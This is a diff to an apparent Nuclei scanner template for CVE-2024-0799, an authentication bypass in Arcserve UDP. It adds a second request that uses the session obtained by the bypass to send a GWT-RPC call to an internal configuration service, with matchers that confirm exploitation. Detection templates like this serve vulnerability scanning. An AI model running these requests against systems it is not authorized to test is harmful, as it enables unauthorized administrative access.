Add more request CVE-2024-0799

http/cves/2024/CVE-2024-0799.yaml

@@ -24,6 +24,8 @@ info:
     fofa-query: icon_hash="1015186617"
   tags: cve,cve2024,arcserve,auth-bypass,vkev
 
+flow: http(1) && http(2)
+
 http:
   - raw:
       - |
@@ -33,15 +35,33 @@ http:
 
         username=Administrator
 
+    matchers:
+      - type: dsl
+        dsl:
+          - "status_code == 302"
+          - "contains_all(set_cookie, 'EDGEJSESSIONID','notShowWizard')"
+        condition: and
+        internal: true
+
+  - raw:
+      - |
+        POST /management/centralmanagementui/service/configuration HTTP/1.1
+        Host: {{Hostname}}
+        X-Gwt-Permutation: {{randstr}}
+        X-GWT-Module-Base: http://{{Hostname}}/management/centralmanagementui/
+        Content-Type: text/x-gwt-rpc; charset=UTF-8
+
+        7|0|7|http://{{Hostname}}/management/centralmanagementui/|7EAFA18B9A4008517B99DCC53178335B|com.ca.arcserve.edge.app.base.ui.client.components.configuration.ConfigurationService|testDownloadServerConnnectionEdge|com.ca.arcflash.webservice.data.PM.AutoUpdateSettings/2684954155|com.ca.arcflash.webservice.data.PM.ProxySettings/566911631||1|2|3|4|1|5|5|0|3|1|0|0|6|7|0|0|7|80|7|0|1|0|
+
     matchers-condition: and
     matchers:
       - type: status
         status:
-          - 302
+          - 200
 
       - type: word
-        part: set_cookie
+        part: body
         words:
-          - "EDGEJSESSIONID"
-          - "notShowWizard"
-        condition: and
+          - "//OK"
+          - "//EX"
+        condition: or